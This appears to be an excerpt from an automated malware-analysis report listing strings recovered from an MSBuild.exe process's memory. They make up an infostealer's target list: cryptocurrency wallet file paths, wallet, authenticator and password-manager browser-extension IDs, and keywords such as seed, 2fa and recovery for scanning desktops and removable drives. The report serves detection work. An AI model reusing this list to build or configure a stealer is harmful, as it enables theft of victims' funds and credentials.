Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|1\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|MetaMask\|1\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|1\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|TronLink\|1\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|BinanceChainWallet\|1\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|1\|0\|Yoroi\|1\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase\|1\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|1\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|1\|iWallet\|1\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|RoninWallet\|1\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|1\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CloverWallet\|1\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|LiqualityWallet\|1\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra_Station\|1\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|1\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|AuroWallet\|1\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|PolymeshWallet\|1\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|1\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98\|1\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|1\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain\|1\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|1\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|1\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Oxygen (Atomic)\|1\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|PaliWallet\|1\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|NamiWallet\|1\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Solflare\|1\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|CyanoWallet\|1\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|1\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|1\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Goby\|1\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|RoninWalletEdge\|1\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|UniSat Wallet\|1\|ppbibelpcjmhbdihakflkdcoccbgbkpo\|1\|0\|0\|Authenticator\|0\|bhghoamapcdpbohphigoooaddinpkbai\|1\|1\|0\|GAuth Authenticator\|0\|ilgcnhelpchnceeipipijaljkblbcobl\|1\|1\|1\|Tronium\|1\|pnndplcbkakcplkjnolgbkdgjikjednm\|1\|0\|0\|Trust Wallet\|1\|egjidjbpglichdcondbcbdnbeeppgdph\|1\|0\|0\|Exodus Web3 Wallet\|1\|aholpfdialjgjfhomihkjbmgjidlcdno\|1\|0\|0\|Braavos\|1\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|1\|kkpllkodjeloidieedojogacfhpaihoh\|1\|0\|0\|OKX Web3 Wallet\|1\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender\|1\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|1\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|GeroWallet\|1\|bgpipimickeadkjlklgciifhnalhdjhe\|1\|0\|0\|Pontem Wallet\|1\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Finnie\|1\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra\|1\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Microsoft AutoFill\|0\|fiedbfgcleddlbcmgdigjgdfcggjcion\|1\|0\|0\|Bitwarden\|0\|nngceckbapebfimnlniiiahkandclblb\|1\|0\|0\|KeePass Tusk\|0\|fmhmiaejopepamlcjkncpgpdjichnecm\|1\|0\|0\|KeePassXC-Browser\|0\|oboonakemofpalcgghocfoadofidjkkk\|1\|0\|0\|Rise - Aptos Wallet\|1\|hbbgbephgojikajhfbomhlmmollphcad\|1\|0\|0\|Rainbow Wallet\|1\|opfgelmcmbiajamepnmloijbpoleiama\|1\|0\|0\|Nightly\|1\|fiikommddbeccaoicoejoniammnalkfa\|1\|0\|0\|Ecto Wallet\|1\|bgjogpoidejdemgoochpnkmdjpocgkha\|1\|0\|0\|Coinhub\|1\|jgaaimajipbpdogpdglhaphldakikgef\|1\|0\|0\|Leap Cosmos Wallet\|1\|fcfcfllfndlomdhbehjjcoimbgofdncg\|1\|0\|0\|MultiversX DeFi Wal
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Flash\|%DRIVE_REMOVABLE%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
